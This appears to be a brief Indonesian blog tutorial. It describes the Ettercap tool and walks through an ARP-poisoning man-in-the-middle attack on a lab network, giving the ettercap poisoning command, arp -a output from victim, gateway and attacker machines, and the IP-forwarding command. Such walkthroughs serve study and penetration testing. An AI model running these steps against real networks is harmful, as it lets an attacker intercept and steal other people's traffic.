DESCRIPTION
Ettercap was born as a sniffer for switched LAN (and obviously even “hubbed” ones), but during the development process it has gained more and more features that have changed it to a powerful and flexible tool for man-in-the-middle attacks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis (such as OS fingerprint).
–|Man in the midle attack
PoC:
skenario
attacker: 192.168.0.155 –> 00:0C:29:F8:D5:FC
korban : 192.168.0.140 –> 00:17:31:23:46:E3
gateway : 192.168.0.1 –> 00:1B:11:47:D4:07
sekarang, sebagai attacker yg harus kita lakukan adalah meracuni
table arp mesin korban dan gateway:
BT #ettercap -o -T -P repoison_arp -M arp:remote /192.168.0.140/
/192.168.0.1/
pada mesin korban, akan terlihat seperti ini:
C:\>arp -a
Interface: 192.168.0.140 — 0×4
Internet Address Physical Address Type
192.168.0.1 00-0c-29-f8-d5-fc dynamic
192.168.0.155 00-0c-29-f8-d5-fc dynamic
pada mesin gateway:
root@gateway:/# arp -a
? (192.168.0.140) at 00:0C:29:F8:D5:FC [ether] on eth0
? (192.168.0.155) at 00:0C:29:F8:D5:FC [ether] on eth0
pada mesin attacker:
BT ~ # arp -a
? (192.168.0.1) at 00:1B:11:47:D4:07 [ether] on eth0
? (192.168.0.140) at 00:17:31:23:46:E3 [ether] on eth0
mengaktifkan ip_forwarding:
BT # echo “1″ > /proc/sys/net/ipv4/ip_forward
BT # cat /proc/sys/net/ipv4/ip_forward
1
0 comments:
Post a Comment